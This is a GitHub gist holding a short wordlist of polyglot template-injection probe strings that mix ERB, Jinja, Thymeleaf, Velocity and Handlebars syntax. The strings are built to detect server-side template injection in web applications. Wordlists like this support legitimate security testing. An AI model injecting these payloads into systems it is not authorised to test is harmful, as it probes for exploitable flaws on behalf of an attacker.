Skip to content

Instantly share code, notes, and snippets.

@insi2304
Last active December 24, 2025 11:29
Show Gist options
  • Select an option

  • Save insi2304/f29c9c450f8e4a863d33569991fc6982 to your computer and use it in GitHub Desktop.

Select an option

Save insi2304/f29c9c450f8e4a863d33569991fc6982 to your computer and use it in GitHub Desktop.
template injection wordlist
p ">[[${{1}}]]
<%'${{#{@}}%>
${{<%[%'"}}%\
<#set($x<%={{={@{#{${xux}}%>)
<%={{={@{#{${xu}}%>
${{/#}}
<%{{#{%>}
{{@
<%'#{@}
<th:t="${xu}#foreach.
{{/}}
<%${{#{%>}}
{{
<%
p ">[[${{1}}]]
<%=1%>@*#{1}
{##}/*{{.}}*/
{#${{1}}#}}
<%=1%>#{2}{{a}}
{{1}}@*
a">##[[${1}]]
{{7}}}
//*<!--{##<%=1%>{{!--{{1}}--}}-->*/#}
{{.}}
<%%a%>
{{1in[1]}}
${"<%-1-%>"}
#evaluate("a")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment